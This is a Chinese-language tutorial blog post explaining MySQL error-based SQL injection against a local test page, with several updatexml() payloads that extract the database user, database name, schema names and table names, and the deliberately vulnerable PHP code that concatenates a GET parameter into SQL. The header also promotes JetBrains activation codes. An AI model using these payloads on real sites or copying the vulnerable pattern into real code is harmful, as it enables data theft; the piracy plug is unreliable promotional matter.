Web安全原理剖析(四)——报错注入攻击[通俗易懂]

Web安全原理剖析(四)——报错注入攻击[通俗易懂]报错注入攻击

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用


1.8 报错注入攻击

  报错注入攻击的测试地址:http://127.0.0.1/sqli/error.php?username=1。

  访问该网址时,页面返回ok,如图28所示。


Web安全原理剖析(四)——报错注入攻击[通俗易懂]


图28 访问username=1时页面的的结果

  访问http://127.0.0.1/sqli/error.php?username=1’,因为参数username的值是1’,在数据库中执行SQL时,会因为多了一个单引号而报错,输出到页面的结果如图29所示。


Web安全原理剖析(四)——报错注入攻击[通俗易懂]


图29 访问username=1’时页面的的结果

  通过页面返回结果可以看出,程序直接将错误信息输入到了页面上,所以此处可以利用报错注入获取数据。报错注入有多种格式,此处利用函数updatexml()延时SQL语句获取user()的值,SQL语句如下所示。

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

Updatexml()函数:Updatexml(xml_target,xpath_expr,new_xml)

  • xml_target:需要操作的xml片段
  • xpath_expr:需要更新的xml路径(Xpath格式)
  • new_xml:更新后的内容

  其中0x7e是ASCII编码,解码结果为~,如图30所示。


Web安全原理剖析(四)——报错注入攻击[通俗易懂]


图30 利用updatexml获取user()

  然后尝试获取当前数据库的库名,如图31所示,语句如下所示。

' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+


Web安全原理剖析(四)——报错注入攻击[通俗易懂]


图31 利用updatexml获取database()

  接着可以利用select语句继续获取数据库中的库名、表名和字段名,查询语句与Union注入的相同。因为报错注入只显示一条结果,所以需要使用limit语句。构造的语句如下所示。

' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

  结果如图32所示,以此类推,可以获取所有数据库的库名。


Web安全原理剖析(四)——报错注入攻击[通俗易懂]


图32 利用报错注入获取数据库名

  如图33所示,构造查询表的语句,如下所示,可以获取数据库test的表名。

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)--+


Web安全原理剖析(四)——报错注入攻击[通俗易懂]


图33 利用报错注入获取数据库表名


1.9 报错注入代码分析

  在报错注入页面中,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,技术处ok;如果出错,则通过echo mysqli_error(@&con)将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下所示。

<?php
$con=mysqli_connect("localhost","root","root","test");
// 检测连接
if (mysqli_connect_errno())
{ 
   
    echo "连接失败: " . mysqli_connect_error();
}

$username = @$_GET['username'];
$sql = "select * from users where `username`='".$username."'";

if($result = mysqli_query($con,$sql))
{ 
   
    echo "ok";
}
else
{ 
   
    echo mysqli_error($con);
}

?>

  输入username=1’时,SQL语句为select *from users where `username`=‘1’。执行时,会因为多了一个单引号而报错。利用这种错误回显,我们可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。


版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187611.html原文链接:https://javaforall.net

(0)
上一篇 2026年4月19日 上午7:22
下一篇 2026年4月19日 上午7:28


相关推荐

  • 软件测试中根据测试用例设计的方法,测试用例设计方法有哪些?举例说明[通俗易懂]

    软件测试中根据测试用例设计的方法,测试用例设计方法有哪些?举例说明[通俗易懂]众所周知,测试用例是编制的一组测试输入、执行条件及预期结果,专门为的是某个特殊目标,即测试某个程序路径,或是核实是否满足某个特定的需求。一般来讲,常用的测试用例设计方法有五种,分别是:正交实验法、边界值分析法、等价类划分法、判定表法、错误推测法。当然测试用例的设计方法不止这些,下面只是通过举例说明着重讲讲这常用的五种方法。一、正交实验法用语言描述正交实验法会很抽象难懂,简单说,就是在各因素互相独立…

    2022年6月29日
    24
  • 魔兽世界正式服模拟(战地模拟器破解版)

    背景:从06年玩魔兽到现在也13年了。5.48的时候在国外读研、时间特别多,在艾苏恩的“魔兽夜店”lm公会(永远记得这段快乐的时光),围攻奥格达到了我的顶峰(带团),回国后找工作6.X没玩。从7.x就开始咸鱼,H都没通。现在也得结婚成家了。以后更加咸鱼了,指不定哪天就AFK。差不多06年的时候就混迹于大芒果、藏宝湾这两个网站,虽然是高中生,那时候用家里的破电脑就开始搭建单机版,改数据库。晚上在自己…

    2022年4月15日
    208
  • 虚拟机进入桌面命令_win7命令激活系统

    虚拟机进入桌面命令_win7命令激活系统一、NeoKylin系统基础命令1.1关机、重启和登出命令shutdown-hnow立即关闭系统init0关闭系统shutdown-tseconds按预定时间关闭系统shutdown-rnow立即重启reboot重启logout注销1.2系统相关信息date显示系统时间arch和uname-m显示处理器架构uname-r显示正在使用的内核版本cat/proc/cpuinfo查看cpu相关信息…

    2022年8月10日
    10
  • python 小波分解_python低通滤波器

    python 小波分解_python低通滤波器0.小波簇类型1.print(pywt.families)即可显示软件内含的小波族:[‘haar’,‘db’,‘sym’,‘coif’,‘bior’,‘rbio’,‘dmey’]它们分别是:lHaar(haar)lDaubechies(db)lSymlets(sym)lCoiflets(coif)lBiorthogonal(bior)lReversebior

    2022年8月30日
    4
  • 如何做职业规划并进行求职准备(持续更新)「建议收藏」

    如何做职业规划并进行求职准备(持续更新)「建议收藏」读《这些道理没有人告诉过你》的职业规划思考1.根据初步判断,我最适合的职位应该是软件测试工程师2.根据初步判断,我最适合的行业应该是软件测试行业?互联网行业?互联网金融行业?电商行业?(不太清楚行业的分类,暂时先这么写吧)3.根据职位与行业,我选定的目标公司应该是:最高目标公司三家:阿里巴巴集团、天猫、京东(亚马逊、沃尔玛百货公司、苏宁云商集团股份有…

    2022年10月20日
    5
  • ENVI中使用水体指数法NDWI提取水体

    ENVI中使用水体指数法NDWI提取水体在进行地类解译时 为了提高工作效率 经常会采用自动解译和人工修订相结合的方式进行 因此 经常会用到 ENVI 或者易康进行地类的自动解译 而其中最常规的指数方法在 ENVI 中的使用如下

    2026年3月18日
    2

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号